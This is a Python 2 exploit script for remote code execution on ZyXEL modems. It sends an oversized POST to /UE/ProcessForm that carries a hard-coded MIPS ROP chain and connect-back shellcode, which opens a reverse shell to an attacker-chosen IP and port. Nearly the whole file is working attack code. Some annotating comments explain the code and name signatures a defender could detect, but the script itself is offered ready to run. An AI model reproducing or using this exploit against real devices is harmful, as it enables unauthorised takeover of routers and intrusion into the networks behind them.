#!/usr/bin/python

#
# ----------------------------------------------------------------------------
# "THE BLASTY-WAREZ LICENSE" (Revision 1):
# <peter@haxx.in> wrote this file. As long as you retain this notice and don't
# sell my work you can do whatever you want with this stuff. If we meet some 
# day, and you think this stuff is worth it, you can intoxicate me in return.
# ----------------------------------------------------------------------------
#

#
# old code, didn't clean up .. but some people keep asking about it.
# the (targeted) RCE exploit for those ZyXEL modem thingies.. ;-]
#
# co-authored by xyrex somewhere in 2012(?)
#
# enjoy!
#
# -- blasty
#

import sys 
from struct import pack
import socket

# 168 byte connectback shellcode (port: 31337)
# Opaque machine-code bytes, kept verbatim. The byte pairs c0de / beef / babe
# are placeholders that the argument handling below overwrites with the
# callback IP and port. (The "168 byte" / "port: 31337" figures are the
# author's; nothing below re-checks them.)
shellcode = "\x24\x0f\xff\xfd\x01\xe0\x20\x27\x01\xe0\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff\x8f\xa4\xff\xff\x24\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0\x3c\x0e\xba\xbe\x35\xce\x7a\x69\xaf\xae\xff\xe4\x3c\x0d\xc0\xde\x35\xad\xbe\xef\xaf\xad\xff\xe6\x23\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x0f\xff\xfd\x01\xe0\x28\x27\x8f\xa4\xff\xff\x24\x02\x0f\xdf\x01\x01\x01\x0c\x20\xa5\xff\xff\x24\x01\xff\xff\x14\xa1\xff\xfb\x28\x06\xff\xff\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xf4\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf8\xaf\xa0\xff\xfc\x27\xa4\xff\xf4\x28\x05\xff\xff\x24\x02\x0f\xab\x01\x01\x01\x0c"

# Python 2 script: `str` is a byte string here, so the chr()/replace() calls
# below edit raw payload bytes. Under Python 3 these lines would not work.
if len(sys.argv) != 5:
	print "usage: %s host port connectbackip connectbackport" % sys.argv[0]
	exit(0)

# (host, port) of the target; int() raises ValueError on a non-numeric port.
victim = (sys.argv[1], int(sys.argv[2]))

# Dotted-quad callback address split into its octets. No validation is done:
# fewer than four parts raises IndexError below, a non-numeric octet raises
# ValueError in int(), and an octet above 255 raises ValueError in chr().
ipp = sys.argv[3].split(".")

# Overwrite the placeholder byte pairs in the shellcode with the callback
# address and port. str.replace() substitutes every occurrence of a marker,
# and each call works on the already-patched string from the previous line,
# so the markers are assumed to occur exactly once and not to collide.
# ip_hi = c0de
shellcode = shellcode.replace("\xc0\xde", chr(int(ipp[0]))+chr(int(ipp[1])))

# ip_lo = beef
shellcode = shellcode.replace("\xbe\xef", chr(int(ipp[2]))+chr(int(ipp[3])))

# port  = babe  (big-endian 16-bit, as ">H")
shellcode = shellcode.replace("\xba\xbe", pack(">H", int(sys.argv[4])))


#shellcode = "\x03\x20\x20\x21"
#shellcode += "\x24\x84\x00\x18"
#shellcode += "\x3c\x19\x2a\xaf"
#shellcode += "\x37\x39\xb2\xfc"
#shellcode += "\x03\x20\xf8\x09"
#shellcode += "\x03\x20\x20\x21"
#shellcode += "/bin/id"

# util function
# util function
def get(*s):
	"""Concatenate the str() form of every positional argument into one string.

	Returns "" when called with no arguments.
	"""
	pieces = [str(item) for item in s]
	return "".join(pieces)
def rop(s):
	"""Encode the integer `s` as a 4-byte big-endian (network order) value.

	Raises struct.error if `s` does not fit in an unsigned 32-bit field.
	"""
	return pack("!I", s)

# gadgets
# Absolute addresses of ROP gadgets and library functions. They are hard-coded
# for one particular firmware/library build that is not recorded here; on any
# other build they presumably point at unrelated code and the chain fails.
gadget1 = 0x2afecd34
gadget2 = 0x2afc95c8
gadget3 = 0x2af95ae4
gadget4 = 0x2afb7628
gadget5 = 0x2afd491c
sleep   = 0x2afeb4e0
# NOTE: this rebinds the builtin `exit` used by the usage check above. Harmless
# only because that check has already run; exit() cannot be called after this.
exit    = 0x2afe96c0
printf  = 0x2afb9f00

# header
# header
# Fixed HTTP request prefix. The body begins with "a=" and is completed by the
# 1000-byte payload slice sent below, which matches the declared
# Content-Length of 1002. The request line reads "HTTP/11" (sic); it is kept
# exactly as the author wrote it. For defenders, the constant path, Host
# value, length and malformed version string make a stable network signature.
header = get(
	"POST /UE/ProcessForm HTTP/11\n",
	"Host: a\n",
	"Content-Length: 1002\n\n",
	"a="
)

# rop chain
# rop chain
# NOTE: this assignment rebinds the name `rop` from the packing helper defined
# above to the finished payload string. The helper is still called inside the
# argument list (evaluated before the rebinding); afterwards `rop` is a str.
# Addresses are packed big-endian and the slot comments use MIPS register
# names ($s0, $s1, $sp, $ra), so a big-endian MIPS target is implied. The
# per-slot comments are the author's; the "?" marks are their own uncertainty.
rop = get(
	"A"*40,

	# gadget 1
	"AAAA",				# $s0
	rop(gadget2),		# $s1
	rop(gadget1),		# $sp

	# gadget 2 - stage 1
	"B"*28,
	"BBBB",				# $s0?
	rop(sleep),			# $s1
	"BBBB",				# $ra?

	# gadget 2 - stage 2
	"D"*28,
	rop(gadget5),		# $s0
	"EEEE",				# $s1
	rop(gadget3), 		# $ra

	# gadget 3
	"F"*28,
	"GGGG",				# $s0
	rop(gadget4),     	# ret in gadget 3
	"H"*48,
	shellcode
)

# connect
# connect
print "[i] connecting to %s:%d" % victim
# 4-second connect timeout; an unreachable or refusing target raises
# socket.error here and the script aborts before sending anything.
s = socket.create_connection(victim, 4)

# prepare payload
# Pad the chain to exactly 1000 bytes. If the chain were ever longer than
# 1000 bytes, `pad` would be negative ("Z"*negative is ""), and the [:1000]
# slice below would silently truncate the payload. len(rop) is the idiomatic
# spelling of rop.__len__().
pad = 1000 - rop.__len__()
pay = rop + "Z"*pad

# send payload
print "[+] sending payload - %d bytes" % pay.__len__()
# socket.send() may transmit fewer bytes than requested; its return value is
# not checked, nothing is read back, and the socket is not explicitly closed.
s.send(header + pay[:1000])

# complete
# Printed unconditionally: nothing here verifies that anything happened.
print "[i] you should have a shell now"
